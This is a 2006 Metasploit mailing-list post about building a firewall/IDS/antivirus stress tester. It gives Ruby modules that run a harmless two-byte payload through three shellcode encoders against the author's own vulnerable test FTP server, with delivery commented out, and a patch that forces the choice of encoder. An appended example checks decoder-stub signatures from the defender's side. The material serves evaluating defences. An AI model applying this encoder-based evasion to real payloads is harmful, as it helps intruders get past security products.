Metasploit mailing list archives

Firewall/IDS/AV Stress Tester


From: vmukhi at vsnl.com (vmukhi at vsnl.com)
Date: Wed, 11 Jan 2006 21:10:51 +0500

I am using the Metasploit Framework to write a Firewall/IDS/Anti Virus stress testing product. Too many people I meet
are convinced that if they use the above products, their networks are safe from intruders. Thus I wanted a product that
will take an exploit and encode it with different encoders to see which signatures are caught by the Firewall/IDS/AV. I
read an e-mail on this list that said that even though we were allowed to specify an encoder, the framework finally
decided. I made the following changes in the source code to achieve my objective. Am I doing the right thing? The code follows.

vijay20.rb
require 'msf/core'

module Msf
class Exploits::Vijay20 < Msf::Exploit::Remote
  include Exploit::Remote::Ftp

  def initialize()
    info1 = {
      'Targets' => [['Windows Universal', {'Platform' => 'win', 'Ret' => 0x13}]],
      'Payload' => {
        #'Encoder' => 'x86/jmp_call_additive',
        #'Encoder' => 'x86/call4_dword_xor',
        #'Encoder' => 'x86/fnstenv_mov',
        #'Space' => 100,
        'BadChars' => "\x90",
      },
      'DefaultTarget' => 0
    }
    super(info1)
  end

  def exploit
    # Dump the raw payload bytes, then the encoded bytes, one hex value per byte
    payload.raw.each_byte { |x| printf("%x ", x) }
    printf("\n")
    payload.encoded.each_byte { |x| printf("%x ", x) }
    printf("\n")
    # Delivery to the test FTP server is commented out; only the two dumps are produced
    #connect
    #buf = "AAAAAAA" + "\x88\xff\x12\x00"
    #buf = buf + payload.raw
    #send_cmd(["USER", buf], false)
    #disconnect
  end # end exploit
end # end class
end # end module

I have written a simple ftp server in C under windows with a buffer overflow. The exploit vijay20.rb first displays
both the raw and encoded payloads, and the rest of the code that connects to the server and serves the exploit is
commented out. The above file is in the modules/exploits folder.

mukhi4.rb
require 'msf/core'

module Msf
module Payloads
module Singles
module Windows
module Mukhi4
        include Msf::Payload::Windows
        include Msf::Payload::Single

        def initialize(info = {})
                super(update_info(info,
                        'Name'          => 'Windows Execute Command',
                        'Version'       => '$Revision: 1.4 $',
                        'Description'   => 'Execute an arbitrary command',
                        'Author'        => 'vlad902',
                        'Platform'      => 'win',
                        'Arch'          => ARCH_X86,
                        'Payload'       =>
                                {
                                        # Two-byte stand-in payload: NOP followed by INT3
                                        'Payload' => "\x90\xcc"
                                }
                        ))
        end

        # Append a trailing null byte to whatever the framework generates
        def generate
                return super + "\x00"
        end
end
end
end
end
end

Payload mukhi4.rb is a simple copy of an existing payload and returns only 90 and cc. This file is placed in the
payloads/singles/windows folder.

manish.rb
require 'msf/base'

framework = Msf::Simple::Framework.create
input  = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new

# Wire the test exploit and the two-byte test payload into an exploit driver
driver = Msf::ExploitDriver.new(framework)
driver.exploit = framework.exploits.create('vijay20')
driver.payload = framework.payloads.create('windows/mukhi4')
driver.exploit.datastore.import_options_from_s('Encoder=x86/jmp_call_additive')
driver.payload.share_datastore(driver.exploit.datastore)
driver.target_idx = 0
driver.exploit.init_ui(input, output)
driver.payload.init_ui(input, output)
driver.run

# Re-run the same exploit/payload pair with each of the other two encoders
driver.exploit.datastore.import_options_from_s('Encoder=x86/call4_dword_xor')
driver.payload.share_datastore(driver.exploit.datastore)
driver.run

driver.exploit.datastore.import_options_from_s('Encoder=x86/fnstenv_mov')
driver.payload.share_datastore(driver.exploit.datastore)
driver.run

A program that we will run as 

ruby -Ilib manish.rb

Output 
90 cc 0
fc bb e7 4b 69 63 eb c 5e 56 31 1e ad 1 c3 85 c0 75 f7 c3 e8 ef ff ff ff 77 87 69 63 77 18 6a 63
90 cc 0
33 c9 83 e9 ff e8 ff ff ff ff c0 5e 81 76 e b 66 1 c5 83 ee fc e2 f4 9b aa 1 c5
90 cc 0
6a 1 59 d9 ee d9 74 24 f4 5b 81 73 13 2e 5e 2c 6a 83 eb fc e2 f4 be 92 2c 6a

In this program, copied from the samples, we run the same exploit vijay20 and payload mukhi4 with different
encoders and hence the output is different.

To achieve this we made the following changes in the file encoded_payload.rb found in folder lib/msf/core

encoded_payload.rb
                        #our code
                        if ( pinst.datastore['Encoder'] )
                                preferred = framework.encoders[ pinst.datastore['Encoder'] ]
                                encoders.unshift([pinst.datastore['Encoder'], preferred ])
                        end
                        #their code
                        encoders.each { |encname, encmod|
                                self.encoder = encmod.new
                                self.encoded = nil

We simply copied some code written earlier so that the variables we set place our encoder first in the array and thus
we can decide the encoder used. Is this the right way to write a stress test product?

We have a site wwww.vijaymukhi.com where you see that I have used a zillion products and languages in the past. From
all of them, your Metasploit Framework is not the best but by far the best framework I have ever used in my life. I
believe that your product will change the way we write exploits and security tools. I have even learnt Ruby and written
over 250 pages on it. You may not realize what a great service you have done people like me who teach OS internals.
Some of the tools I now plan on writing could not have been possible without your framework.

An open offer: if any developer from your team comes to Mumbai/Bombay, India, please be my guest. You will be doing me a
favour. My way of saying thank you for the great framework that you have built.

Vijay Mukhi
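An added example, not code from the post above: the detection-side reading of the three encoded dumps it prints. It parses the post's "%x "-style output and checks that a signature on the raw payload bytes no longer matches after any of the three encoders has run, while a signature on the key-independent bytes of each decoder stub (derived here from the dumps, with the key and length bytes wildcarded) still does. Encoder names and byte values come from the post's output; the helper names are my own.

```ruby
# Added example: detection-side view of the post's output, not code from the post.
# The raw payload is "\x90\xcc" plus the "\x00" that mukhi4.rb appends.
RAW_PAYLOAD = "\x90\xcc\x00".b

# Encoded dumps copied from the post, exactly as its printf("%x ") loop printed them.
ENCODED_DUMPS = {
  'x86/jmp_call_additive' => 'fc bb e7 4b 69 63 eb c 5e 56 31 1e ad 1 c3 85 c0 75 f7 c3 e8 ef ff ff ff 77 87 69 63 77 18 6a 63',
  'x86/call4_dword_xor'   => '33 c9 83 e9 ff e8 ff ff ff ff c0 5e 81 76 e b 66 1 c5 83 ee fc e2 f4 9b aa 1 c5',
  'x86/fnstenv_mov'       => '6a 1 59 d9 ee d9 74 24 f4 5b 81 73 13 2e 5e 2c 6a 83 eb fc e2 f4 be 92 2c 6a',
}

# Decoder-stub signatures derived from those dumps: the XOR key and length bytes
# vary per run, so they are wildcarded (nil); the rest is the constant decoder code.
STUB_SIGNATURES = {
  'x86/jmp_call_additive' => [0xfc, 0xbb, nil, nil, nil, nil, 0xeb, 0x0c, 0x5e, 0x56, 0x31, 0x1e, 0xad, 0x01, 0xc3],
  'x86/call4_dword_xor'   => [0x33, 0xc9, 0x83, 0xe9, nil, 0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5e, 0x81, 0x76, 0x0e],
  'x86/fnstenv_mov'       => [0x6a, nil, 0x59, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13],
}

# Turn a "%x "-style dump (no zero padding) back into a binary string.
def parse_dump(dump)
  dump.split.map { |h| h.to_i(16) }.pack('C*')
end

# True if the wildcard byte pattern occurs anywhere in data.
def match_pattern?(data, pattern)
  bytes = data.bytes
  (0..bytes.length - pattern.length).any? do |off|
    pattern.each_with_index.all? { |b, i| b.nil? || bytes[off + i] == b }
  end
end

# Per encoder: does the raw-payload signature still hit, and does the stub signature hit?
def detection_report
  ENCODED_DUMPS.each_with_object({}) do |(name, dump), report|
    blob = parse_dump(dump)
    report[name] = {
      raw_sig_hit:  blob.include?(RAW_PAYLOAD),
      stub_sig_hit: match_pattern?(blob, STUB_SIGNATURES[name]),
    }
  end
end

if __FILE__ == $0
  detection_report.each { |name, r| puts "#{name}: raw_sig=#{r[:raw_sig_hit]} stub_sig=#{r[:stub_sig_hit]}" }
end
```

The practical consequence for the stress test is that a product whose signatures only describe the raw payload will report all three encoders as "missed", whereas one that also matches decoder stubs catches every run here.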
